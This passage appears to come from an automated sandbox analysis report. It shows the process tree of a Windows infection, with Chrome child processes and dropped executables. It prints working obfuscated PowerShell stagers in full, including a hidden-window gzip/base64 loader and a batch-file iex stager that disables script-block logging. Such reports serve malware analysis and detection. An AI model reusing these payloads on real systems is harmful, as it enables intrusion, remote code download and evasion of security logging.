      powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABHADYAWQBXAGMAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHcAYQBxAFEAYgBLAHMATwBOAG8ARgBMAGsAMABpAFYAYgBtADEAaQBvAEEAJwAnACsAJwAnADMARQB7ADAAfQBBAEUAQwBIAEQAcAB0ADcATQBYAGUAcwB2AFkAUwBlAHcAawBoAHYAZgA3ADMAbQB6AFUANABvAGQAZQBrAGwAegB1AHAAbABrAGoAMgBaAFcAWgAyADkAcABsAG4AWgBuAGEAKwBTAGcATgBCAGUAYQBxAEkAaABaAHMAcgBYADkAKwArAFUAWABhAGYAaAB6AE8AYwBLAEYAbwBsAHUAMABFAGkATQBaAFEASwB3ADkAYQBrAHAAVAAvAHQAVgA1AGIAUgA4AE0AdQBSADgAbABIAFIAcABtAGkANQBiAFAASQBFADAAMwBSADIAZQB1AHEAcwBzAG8AeQBrAFkAagB1AHYAdABvAGgAQQBlAFUANgBTAEcAMABaAEoAcgB1AG4ASwBYADgAbwBvAEoAaABrADUAdQBMAGoANQBRAGcASwBoAGYARgBVAHEAZgAxAFoAYgBqAE4AOQBnAHQAaABQAGIATwBEAGkASQBpAFgASwBBADAAbABEAHUAbgBmAE0AQQBTACsAKwBxAC8AcABKAFIAbwBhAGwALwAvAEsASABxADAANABQAGEAcgBIAHAAMgB1ADgASQBzADEAMQBSAC8AawB3AHUAUwBWAEUAUABHAFYARgAzADUAcABzAHMARAByAHoAWgBMAG8AcQBsAGQARwBtAFEAOAA1ADMATgBSAEgAZABHADAAZgBsAGcAZABwAEQAbQBlAGsAewAwAH0ANQBZAHUAeQBOAGQASQBtAEkAZQA1AGkAcgBjADUAdQBrACsARwBSAEcAcgBMAE4AMQBkAFMAOQByAFoAUwBtAGsAcQBEAEwAMgBNAEIAeQBnAE0ATQA1AEwAbgBxAHEARgBNADUAUQBuAFQAMgBlAHsAMAB9ADMAYgBiAG8ANwAvAG4ASwBWAEMAcABxAFEAYQBpAGMAVgBKAE8ATgBMAG4AMgBSADMATgBDAEIANQB0AFkAMwBUAGsASgBGAEwATQBwACsAQgBsAGkAOAB5AG0AawBZAHoAWABRAGUAewAwAH0ATwA3ADQAZwBXAGkAVgBkAE0AVwBZAG8ALwA4AFcATQAxAGkAUAByAEUAcgB6AFgASwBtAG4ANwBTAGkARABsAGkAVQB3ADMASQBMAEQAUABYAGIAVABMAHcAewAwAH0AVQBqAFcAMQBYADEARwBVACsAMwBiAE4ARABoAGUAMgBRAEUAZwBQAGgATgA0AGoAZwB2AGkAYgBRADUAUABuAEwANABNADAAewAwAH0ANgAnACcAKwAnACcAVwBpAGkALwBhAGIARgBEAHcARwAnACcAKwAnACcALwBOADQAegBrAHQAdABEADgAcQBsAHEARgAwAHcAUQBFAHMAZQBMAGEAQgBhAGUAVQBxAFcAewAwAH0ARgA5ADkAbwBpADYAVQBwAG4ASABrAGYARgBhAFkANwAnACcAKwAnACcAVgBTAEUALwBUAFcAagBUAHYAbQB3AHQAcAAwAHkARwBrADQAZQA3AEwAdwBIAFEAMABxAHkANAB1AGIAbwAxAEIASwB2AGMAegBxAEoAcABuAFQAbABEAFEAMwBLAFUANQBvAFUAQgBKAFgAZQB5ADQAMgBaAE0ANQBJAGcAVQBxADEARgBPAHUAQgBqADUAcQA2ADIAeQBCAGgAawB6AEEAUwBZAFMASABCAGwAaABUADUAUQBlADAAcwBvAGUASgBSADEAMQA1AFIARgBwAEkATQBCAFIARABmAEgATAB5AEMAMABPAHYAZgBPADcATwBOAG4ANgBaADIAMABpADUASgBBAEwALwB0AEgARABoAGIAbQBVAE8ANgBrAEYASgA2AGwAeQBLAGIAOABuAFEANQBCACcAJwArACcAJwB5AEgAVgBZAFQAagBQAEQAYwBWAGIAUQBiADQARwBoAHUASQBUAHoARQBoAG8ASwBDAGoATgA2AFcANABMAHIAUQBRAHYAaAB1AHEAVAB1ADkAMABWAEUAegAnACcAKwAnACcAVABBAHUAUwBqAE4AegBmAFIALwA0AHIAawA3ADEAKwBGAHAATAByAEoAVgBBAEsARQBGAEQASwA3ADgASgBRAGsAbwBaAGgASQBTAFEAMgBuAFQAawBOAGcAYgBuADAAYgBsACsAZQBxACcAJwArACcAJwB6AGcARABpAFkATQBVAGcAagBzAEgAUQBIAEEAWQBFAFYAQwBZAFEAdgBKAEcARwB5ADAAQwBqAEkAbwBWAGQAOQBJAGoAcgBKAGsAcABFAEUAUgBJAHIANgA0AFQASQBjAFEAYgBYAFkANQBVAHAAQgBNAEIAeQBSAFUASAAzAEoAMABUAEkAbAB0AHYAeQBYADAASgBTAFkANwBMAGsASgA4AGYAWQBaAEYANABZAHkAcABKAG0AQQBjAGkAUgBoAEwAagBqADIAZgA5AHsAMAB9ADQAcABoAEEAVgAvAGoAZwBaADIAUQBWAEkASwB6AE4AdABhAG0AKwBFAHoASQBSAEsAMwBPAFIAOQB5AGQAUQBkAFMAZwBVAG0AbQBRAEEAOAAzAEkAdwBuAE4AcwA3AEoAVQBXAE4AYgBkAEwAUgAnACcAKwAnACcAMwA1AGcAWAAxAEUASAB6AGoAVABzAHEANgA0AGEAYwAnACcAKwAnACcARgByAFgAWABXADgATwB2AEMAYgA5AEMAZABIADMAdgAnACcAKwAnACcAQwA0AGcAbQB0AGQAMwBnADMAYwBIAEsAdgA1AFIANABqAHUAbwA3AFcAdwBYAEUAUABCAGUARwBuAGsASgB6ADQAdwA0AGIAdwB6AHoAcgBDADgAVgBDADcAVAB5ADIANwBFAFEAZQAyAGQAUwBYAEgAdABTAGkAaQBWAGoAUgBHAFkAYQA4AGYAQgA4AHoAeQBtAG0AMwBUAEgAKwBjAFcAWABiAGQASAAwAHQAYgBXAFIAdABCAG8AdABLADgAdABWAEsAOAAnACcAKwAnACcAMwBMAHUAcgBXAEEAZwBBAGMAZwA5ADQAQwBkAEIASwA2AHYAagArAEgATQBWAFQAWABpADMATwA3AGsAOQB0AFcAaAA1ADEAOQBjAGkANQB2AFIAbwBmAHUAWgBNAFQAYQBaAHMATwBOADUAeQBPAGUAKwAwAGYAagBwAG0AbQBhAEoAeQAnACcAKwAnACcARgB1AGQAagBjAEkAMgBUAHkAcwBkAHoAZgBYAHQAVQB0ACsAMQBRADQAUwB1ADUARgB5ADgAOABSAHAATABOAEEAWgBRAGsANQA2AE4AbgBSAHQALwBuAGwAcwBaADgAZwB6AGgAegBoAGEAOABsAEUAdwB3AG0ARQByAGMAcABCADkANQBGAEEAeQA2AFEAOQBjAHUAOQA5ADMAYgBUAFIAbwBmAGIAbAB0AG4AcABpAFIAZQBUAEsANgB7ADAAfQByAEUAOQBHAGgANwBTAHkAZgBMADYATQBvAGEANQB1ADIANwAzAFAANQB0AFcAbwB7ADAAfQBPAFMAQgB6ADUAWgBBADMAQQB0AGoAbgBCADAAQwBUAEsAUgBjAHsAMAB9AGoARQBjADUAQgBwAHYAawBmADIAKwB7ADAAfQA3AFAARAAvAEgAQwA1AHMAZwBHAEcAWABkAHkAaQAxAHIAewAwAH0AZQBPAGwANgBEAFAAYQB2AEIAbwBjAGMARABWAG4AdgBHAHEAUAB6AHkAYwBZADEAegBkAHIAWQBhADYAQwAyAHsAMAB9AFUAZQB0AEMAUABWAEIASABFAGQAMgBIADYAUAA4AHIAdgBuAFEATgBHACcAJwArACcAJwB2AEQAawBJAGUAagAzADMAcgBqAHUAVABtADgAWgBoAC8ATQBwAHQAUAAzADQAbQB0ADUAWgAzAE8AWgB5AEwALwByAGQAdgBOAHoATQBLAG0AdABnADQAcwBQAHsAMAB9ACsAYwBqAE8AawB3ADQARwBwAGoAbQA4AEIAMgBRAFkAagBxAGcAcQBhAGcAZgB6AGkAcABSAGUAQwAvAHIANQA5AHMAMwBsAGIAdAAwAHUARQBlAE0AbAAxAHAAJwAnACsAJwAnAEUARgAyAGQANQBqAEIAawBRAEIAawBwAC8AbQBiAHcAdQB6ADkAewAwAH0AZABLAGYAYwA0AGwAUgBxAGEAVgByAHcATgBGAGkAUgBMAEMAWQBOAFcAQwBzADIAMgBwAEQAewAwAH0AaQBqAEEAZQB5AG0AMgB5AEwAUAByAFMAeQBiAFkAJwAnACsAJwAnAE8AUgAvAFcANwBRAEsAYgB7ADAAfQAnACcAKwAnACcANgBiAHEAUQByAGoANABMADYAVQA1AGMAcABsADAANQBQAEoAKwBBAG0ASgBKAEgAawBkAC8AVwBjAHAASgBHAEkARABlAHUAKwBiAGwAbgBRAEcAcQB7ADAAfQA3AHEAMQBHAGsAeQArAHMAdgA1AC8ARABsAFIAaQB1AE0ARwBiAEsANQBTACcAJwArACcAJwBIAEIASwA0ADYAdwB3AEQAdgBiAG8AWABOAEcAMABYADQAOABYAFAAQwBRAEUARgBMAEsAZgBJAFAAWQBTAGUASABEADQAQQBnAG8AUABWAE0ASgB0AEwAWgBBAFEAMgBwAHkAegBmAFEAQwAzAE4AMwB1AGsAdwB6ADUAOABnAEYAcwBOADcAagA2AFYAagB3AGoASgBFADkAQQAvAEkATABkAEsAUgBjAGoAbQB1AHQAKwBzAEsAdwArAGQAWAA4AHUAYwBYAFUARwBMADQAVgAvADQAcgA4AHsAMAB9ADUAVwAnACcAKwAnACcAdgB2AEoANwBxAHYAWQBaAEIAawBGAE8AagArAHMAZgByACsAdwAxAHcAOQArAEkAUQBRAGoAVABBAFYASQArAGwAQwBaACcAJwArACcAJwBHAGQAbQArAEcARgA1AEEAWQBwAGMAdQBlAHkARgArADYARQBBAHEAegBIAGUAZgBmAEYAQgBmAHIATQBSAEIARAA1ADUAbgBSAFgAUAA0AEcANgBiAHMAZQBIAC8ATwBDAHcAQQBBACcAJwApAC0AZgAnACcAeAAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1640
    - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAHG6YWcCA7VWbW/aSBD+Xqn/waqQbKsONoFLk0iVbm1ioA'+'3E{0}AECHDpt7MXesvYSewkhvf73mzU4odeklzuplkj2ZWZ29plnZna+SgNBeaqIhZsrX9++UXafhzOcKFolu0EiMZQKw9akpT/tV5bR8MuR8lHRpmi5bPIE03R2euqssoykYjuvtohAeU6SG0ZJrunKX8ooJhk5uLj5QgKhfFUqf1ZbjN9gthPbODiIiXKA0lDunfMAS++q/pJRoal//KHq04ParHp2u8Is11R/kwuSVEPGVF35pssDrzZLoqldGmQ853NRHdG0flgdpDmek{0}5YuyNdImIe5irc5uk+GRGrLN1dS9rZSmkqDL2MBygMM5LnqqFM5QnT2e{0}3bbo7/nKVCpqQaicVJONLn2R3NCB5tY3TkJFLMp+Bli8ymkYzXQe{0}O74gWiVdMWYo/8WM1iPrErzXKmn7SiDliUw3ILDPXbTLw{0}UjW1X1GU+3bNDhe2QEgPhN4jgvibQ5PnL4M0{0}6'+'Wii/abFDwG'+'/N4zkttD8qlqF0wQEseLaBaeUqW{0}F99oi6UpnHkfFaY7'+'VSE/TWjTvmwtp0yGk4e7LwHQ0qy4ubo1BKvczqJpnTlDQ3KU5oUBJXey42ZM5IgUq1FOuBj5q62yBhkzASYSHBlhT5Qe0soeJR115RFpIMBRDfHLyC0OvfO7ONn6Z20i5JAL/tHDhbmUO6kFJ6lyKb8nQ5B'+'yHVYTjPDcVbQb4GhuITzEhoKCjN6W4LrQQvhuqTu90VEz'+'TAuSjNzfR/4rk71+FpLrJVAKEFDK78JQkoZhISQ2nTkNgbn0bl+eq'+'zgDiYMUgjsHQHAYEVCYQvJGGy0CjIoVd9IjrJkpEERIr64TIcQbXY5UpBMByRUH3J0TIltvyX0JSY7LkJ8fYZF4YypJmAciRhLjj2f9{0}4phAV/jgZ2QVIKzNtam+EzIRK3OR9ydQdSgUmmQA83IwnNs7JUWNbdLR'+'35gX1EHzjTsq64ac'+'FrXXW8OvCb9CdH3v'+'C4gmtd3g3cHKv5R4juo7WwXEPBeGnkJz4w4bwzzrC8VC7Ty27EQe2dSXHtSiiVjRGYa8fB8zymm3TH+cWXbdH0tbWRtBotK8tVK8'+'3LurWAgAcg94CdBK6vj+HMVTXi3O7k9tWh519ci5vRofuZMTaZsON5yOe+0fjpmmaJy'+'FudjcI2TysdzfXtUt+1Q4Su5Fy88RpLNAZQk56NnRt/nlsZ8gzhzha8lEwwmErcpB95FAy6Q9cu993bTRofbltnpiReTK6{0}rE9Gh7SyfL6Moa5u273P5tWo{0}OSBz5ZA3AtjnB0CTKRc{0}jEc5Bpvkf2+{0}7PD/HC5sgGGXdyi1r{0}eOl6DPavBoccDVnvGqPzycY1zdrYa6C2{0}UetCPVBHEd2H6P8rvnQNG'+'vDkIej33rjuTm8Zh/MptP34mt5Z3OZyL/rdvNzMKmtg4sP{0}+cjOkw4Gpjm8B2QYjqgqagfzipReC/r59s3lbt0uEeMl1p'+'EF2d5jBkQBkp/mbwuz9{0}dKfc4lRqaVrwNFiRLCYNWCs22pD{0}ijAeym2yLPrSybY'+'OR/W7QKb{0}'+'6bqQrj4L6U5cpl05PJ+AmJJHkd/WcpJGIDeu+blnQGq{0}7q1Gky+sv5/DlRiuMGbK5S'+'HBK46wwDvboXNG0X48XPCQEFLKfIPYSeHD4AgoPVMJtLZAQ2pyzfQC3N3ukwz58gFsN7j6VjwjJE9A/ILdKRcjmut+sKw+dX8ucXUGL4V/4r8{0}5W'+'vvJ7qvYZBkFOj+sfr+w1w9+IQQjTAVI+lCZ'+'Gdm+GF5AYpcueyF+6EAqzHeffFBfrMRBD55nRXP4G6bseH/OCwAA')-f'x')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3788 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2404 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3812 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3940 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3972 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2416 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=4056 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3956 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1528 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3872 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2148 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1052
- C:\Users\Admin\Downloads\Transfer2.exe
  "C:\Users\Admin\Downloads\Transfer2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3952 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3756 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1348
- C:\Users\Admin\Downloads\Transfer3.exe
  "C:\Users\Admin\Downloads\Transfer3.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3772 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:1752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1928 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:1088
- C:\Users\Admin\Downloads\Excel.exe
  "C:\Users\Admin\Downloads\Excel.exe"
  2⤵
  - Executes dropped EXE
  PID:1624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=556 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=3696 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3864 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2368 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1640
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\Downloads\Document.bat" "
  2⤵
  PID:1896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\Admin\Downloads\Document.bat')|iex"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcwBpAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAFIAcwBJAE8AbgAuAE0AQQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJAA2AEMAZQAwAD0AWwByAGUARgBdAC4AQQBzAFMAZQBNAGIAbABZAC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAATABkACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkADYAQwBlADAAKQB7ACQAOABGAEIAYQA9ACQANgBjAEUAMAAuAEcAZQB0AFYAQQBsAHUARQAoACQAbgB1AGwAbAApADsASQBmACgAJAA4AGYAQgBBAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAOABGAGIAYQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAQgBBAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBhAGwAPQBbAEMATwBMAGwARQBjAFQAaQBPAG4AcwAuAEcAZQBOAEUAUgBJAGMALgBEAGkAQwB0AGkAbwBOAGEAcgB5AFsAUwBUAHIASQBuAGcALABTAFkAcwB0AGUAbQAuAE8AYgBKAEUAYwB0AF0AXQA6ADoATgBFAFcAKAApADsAJABWAGEAbAAuAEEAZABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAB2AEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkADgAZgBiAGEAW